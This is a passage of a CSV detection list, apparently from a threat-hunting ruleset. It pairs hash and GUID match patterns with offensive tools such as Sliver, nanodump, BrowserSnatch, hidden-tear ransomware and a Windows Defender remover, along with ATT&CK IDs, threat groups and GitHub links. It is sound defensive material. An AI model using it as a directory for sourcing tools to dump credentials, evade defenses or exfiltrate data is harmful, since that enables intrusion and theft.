"*55e9c45179e5688405513330884f614cc9d97b9bef74ea64c3c6d8dd992a7e9c*",".{0,1000}55e9c45179e5688405513330884f614cc9d97b9bef74ea64c3c6d8dd992a7e9c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26920" "*55F0368B-63DA-40E7-A8A5-289F70DF9C7F*",".{0,1000}55F0368B\-63DA\-40E7\-A8A5\-289F70DF9C7F.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","0","#GUIDproject","N/A","9","2","167","25","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z","26921" "*55f149f758ed7b39a0277fb798f84b9f213efe29a6966e3805ba445ce405e4d8*",".{0,1000}55f149f758ed7b39a0277fb798f84b9f213efe29a6966e3805ba445ce405e4d8.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26922" "*55f8bbbb112a0bf874c09d9a908fa42773bbc0d9ce3495bb2496b60900e7f09a*",".{0,1000}55f8bbbb112a0bf874c09d9a908fa42773bbc0d9ce3495bb2496b60900e7f09a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26923" "*560a6a33d09d60063663df714e535b74f7ce1e9fb8736ff768cd89bf1e333e39*",".{0,1000}560a6a33d09d60063663df714e535b74f7ce1e9fb8736ff768cd89bf1e333e39.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26924" 
"*560eff9456ec2dfd07ac44e6d9a79dcdc678d49a029bf3b0e7f75dc5bbec0ffb*",".{0,1000}560eff9456ec2dfd07ac44e6d9a79dcdc678d49a029bf3b0e7f75dc5bbec0ffb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26925" "*5612ea4ef90043eb2d52ecff3ed05608f0ca76412f5466d37b9b8e0dabc51a05*",".{0,1000}5612ea4ef90043eb2d52ecff3ed05608f0ca76412f5466d37b9b8e0dabc51a05.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26926" "*5615ab2d386e0a85a54c65dd9fc4a03162150007a56ae4eccda644095ce34055*",".{0,1000}5615ab2d386e0a85a54c65dd9fc4a03162150007a56ae4eccda644095ce34055.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","26928" "*561c5f3163f3e6864d547c4412339872841fd9b5d365f10a0d95d2bb366b8396*",".{0,1000}561c5f3163f3e6864d547c4412339872841fd9b5d365f10a0d95d2bb366b8396.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack 
Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","26929" "*561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230*",".{0,1000}561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26930" "*561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230*",".{0,1000}561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26931" "*561d3b61a103c4e94469ad8d9758f96676fc4fce3c489140f8c6864a8e4c55b9*",".{0,1000}561d3b61a103c4e94469ad8d9758f96676fc4fce3c489140f8c6864a8e4c55b9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26932" "*5627805837c5e8f2f5db7ae56fc3ccee6397c615c8458ae0285216588f5b8d7c*",".{0,1000}5627805837c5e8f2f5db7ae56fc3ccee6397c615c8458ae0285216588f5b8d7c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26933" "*563b3de7dbb4765e6d4601786536c339df8e29d46a3cd75f19a16c9c8e0b8dd7*",".{0,1000}563b3de7dbb4765e6d4601786536c339df8e29d46a3cd75f19a16c9c8e0b8dd7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26934" "*56413e30a0f7b6386b0caa4048c7fc5eafa1df9d8966f84bde08fc0cde16c2de*",".{0,1000}56413e30a0f7b6386b0caa4048c7fc5eafa1df9d8966f84bde08fc0cde16c2de.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26936" "*5643f39d347a5b36f195edcd9dbba33cc3417d76ad99892a029aefa96817b41a*",".{0,1000}5643f39d347a5b36f195edcd9dbba33cc3417d76ad99892a029aefa96817b41a.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#filehash","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","26937" "*5649329377ee03a1aace70be74650290f8d6bb597351daf62d1a6a4a37db53cb*",".{0,1000}5649329377ee03a1aace70be74650290f8d6bb597351daf62d1a6a4a37db53cb.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","26938" "*564967ff2524b78c74c3a7d3b31fd7bdc0750c6c478fb15c571fe7fdc82e31a2*",".{0,1000}564967ff2524b78c74c3a7d3b31fd7bdc0750c6c478fb15c571fe7fdc82e31a2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26939" "*564fdc3bdd17f8574a94502ea54a02cf39b0b93ef44c09af38446d4478304a12*",".{0,1000}564fdc3bdd17f8574a94502ea54a02cf39b0b93ef44c09af38446d4478304a12.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - 
TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26942" "*56563020331400f5b1da0963a37a4a5210f4bf969c594f637daee819b98e7ecf*",".{0,1000}56563020331400f5b1da0963a37a4a5210f4bf969c594f637daee819b98e7ecf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26943" "*56598F1C-6D88-4994-A392-AF337ABE5777*",".{0,1000}56598F1C\-6D88\-4994\-A392\-AF337ABE5777.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#GUIDproject","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","26944" "*565d4502e4f8d24a2bf76a7cffdf27b54604b8211c3986ae05fa75bb46d8b356*",".{0,1000}565d4502e4f8d24a2bf76a7cffdf27b54604b8211c3986ae05fa75bb46d8b356.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","26946" "*565e40d59cf30f23587c75bc33d9f452ba9017650f4ab259af77b1d219bdb19d*",".{0,1000}565e40d59cf30f23587c75bc33d9f452ba9017650f4ab259af77b1d219bdb19d.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26947" "*56633694db3e8d8f7022bbc09920592e414c90155e273fbea96b6299bab97275*",".{0,1000}56633694db3e8d8f7022bbc09920592e414c90155e273fbea96b6299bab97275.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26948" "*5664867318d287a388546bbb20c8d7fb7d24680a97209f4f29d25b9cb9da24ec*",".{0,1000}5664867318d287a388546bbb20c8d7fb7d24680a97209f4f29d25b9cb9da24ec.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","26950" "*5669b6b74c00b6c512606e36325d11ea949f88cb29e35e70d4182f3d1d5b7a04*",".{0,1000}5669b6b74c00b6c512606e36325d11ea949f88cb29e35e70d4182f3d1d5b7a04.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26951" 
"*566e27a6f2a96e268b6f21b88db8f3488739b0d780e82ac516b3ee14c5fc337f*",".{0,1000}566e27a6f2a96e268b6f21b88db8f3488739b0d780e82ac516b3ee14c5fc337f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26952" "*567639e3dc4355c549e9c9cc42988325cb95a0f6e86004d5679ad3e15af7c6cd*",".{0,1000}567639e3dc4355c549e9c9cc42988325cb95a0f6e86004d5679ad3e15af7c6cd.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","26954" "*56860821457ebef4e71091ee01f6abe3703bc83cc56ae6db40ed140ab1c48043*",".{0,1000}56860821457ebef4e71091ee01f6abe3703bc83cc56ae6db40ed140ab1c48043.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26956" "*56888116d58c75328e0b32af2b26f98c1f79e6b513e436db51aa650efa55a60b*",".{0,1000}56888116d58c75328e0b32af2b26f98c1f79e6b513e436db51aa650efa55a60b.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","26957" "*568a162e78cabe48a7f30df47b2435b211549e9a7bc7a06f0802b6fc07b7cc94*",".{0,1000}568a162e78cabe48a7f30df47b2435b211549e9a7bc7a06f0802b6fc07b7cc94.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26958" "*56937d0eb5b5702acd0a7d19206c3e79b99e5e334544a47b342fb4a845f8f29b*",".{0,1000}56937d0eb5b5702acd0a7d19206c3e79b99e5e334544a47b342fb4a845f8f29b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - 
T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26962" "*5693e15e2266306f4a9f8a0ab4abc687593f5295beb09b7804af997efc05c6a5*",".{0,1000}5693e15e2266306f4a9f8a0ab4abc687593f5295beb09b7804af997efc05c6a5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26963" "*5696de366805239d730793f8bcb78d54bc2e8c07f06795e089dcfc8f6fed8184*",".{0,1000}5696de366805239d730793f8bcb78d54bc2e8c07f06795e089dcfc8f6fed8184.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26964" "*56997e6f1f96b6ebc89a03491b3f97077a3352730566c48bdb02b4d59d284001*",".{0,1000}56997e6f1f96b6ebc89a03491b3f97077a3352730566c48bdb02b4d59d284001.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - 
TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","26966" "*569baf3aa71bcad8c0b978885b98edfc91a16dae9d33a03999269b2c43be3224*",".{0,1000}569baf3aa71bcad8c0b978885b98edfc91a16dae9d33a03999269b2c43be3224.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26968" "*569d0ac16a89509e1de01deab2fefe2731a48bec2ab7794d9ac0628a6baf2481*",".{0,1000}569d0ac16a89509e1de01deab2fefe2731a48bec2ab7794d9ac0628a6baf2481.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","26969" "*56a0e08a01309e17e4e6c753948fd4f341e9a41b1b834b3ce697bffdd90c467b*",".{0,1000}56a0e08a01309e17e4e6c753948fd4f341e9a41b1b834b3ce697bffdd90c467b.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","26970" "*56a26ec84de85315d3123471e8b231d593d2bcb0539528c51f47f23a1db2f5dd*",".{0,1000}56a26ec84de85315d3123471e8b231d593d2bcb0539528c51f47f23a1db2f5dd.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","26971" "*56a4d640936bc70b69883f930565e6abb43377e498836da5e8eba7d5f4f7acf9*",".{0,1000}56a4d640936bc70b69883f930565e6abb43377e498836da5e8eba7d5f4f7acf9.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","26972" "*56ab5129d379ec39c8037a5937b4ce5cf6680377786548df125b93473e67623a*",".{0,1000}56ab5129d379ec39c8037a5937b4ce5cf6680377786548df125b93473e67623a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26974" "*56acdd67faeb3b1dd15632102f4cb068acdbdc24e0f78f856824610a8be9ab91*",".{0,1000}56acdd67faeb3b1dd15632102f4cb068acdbdc24e0f78f856824610a8be9ab91.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that 
utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","26975" "*56b15b80abb7b1bd3bb80d41347fcd9d26668499220a1dcd7d292714fbd7d350*",".{0,1000}56b15b80abb7b1bd3bb80d41347fcd9d26668499220a1dcd7d292714fbd7d350.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","26978" "*56b8e87c6016e38e0c6700b97b848441e89777842153de74813a445b3e7fd5dc*",".{0,1000}56b8e87c6016e38e0c6700b97b848441e89777842153de74813a445b3e7fd5dc.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26979" "*56bb18010f13a33947c24d31f51e16d8c688cf9c753c1d52f79a9ba64e5c0dca*",".{0,1000}56bb18010f13a33947c24d31f51e16d8c688cf9c753c1d52f79a9ba64e5c0dca.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","26980" "*56c212ce0a433a9077d17ead7c8bf2a52586c2347c7b2534e141f56ff6ede78d*",".{0,1000}56c212ce0a433a9077d17ead7c8bf2a52586c2347c7b2534e141f56ff6ede78d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26984" "*56c239dd4b23657f74701ab8943f54ed04f251fd4f6c1fa0d532d1c617945dc4*",".{0,1000}56c239dd4b23657f74701ab8943f54ed04f251fd4f6c1fa0d532d1c617945dc4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26985" "*56c40fda72d7c0c202d57c7c69690d348ba9bc1a1f133cc6d39cf564d560cb1d*",".{0,1000}56c40fda72d7c0c202d57c7c69690d348ba9bc1a1f133cc6d39cf564d560cb1d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - 
